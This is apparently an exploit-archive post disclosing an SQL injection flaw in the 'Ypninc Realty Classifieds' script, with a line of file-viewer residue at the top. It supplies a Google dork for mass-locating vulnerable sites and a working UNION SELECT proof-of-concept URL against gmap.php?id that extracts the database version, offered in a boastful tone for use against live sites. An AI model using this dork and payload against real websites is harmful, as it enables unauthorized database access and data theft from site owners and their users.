19 lines
No EOL
479 B
Text
19 lines
No EOL
479 B
Text
Script Name: Ypninc Realty Classifieds
|
|
Script Demo: http://fsbo.ypninc.com/
|
|
BUG: Sql INjection
|
|
google dork: inurl:"gmap.php?id=";
|
|
OBS: With this dork you will find a lot of sql injection aiuhauiha ;D
|
|
Found: by Br0ly
|
|
|
|
|
|
Lame script ;/...
|
|
|
|
p0c:
|
|
|
|
http://server/gmap.php?id=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,@@version,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42--
|
|
|
|
xPloit:
|
|
|
|
http://server/gmap.php?id=[sqli]
|
|
|
|
BraZil.. ;D |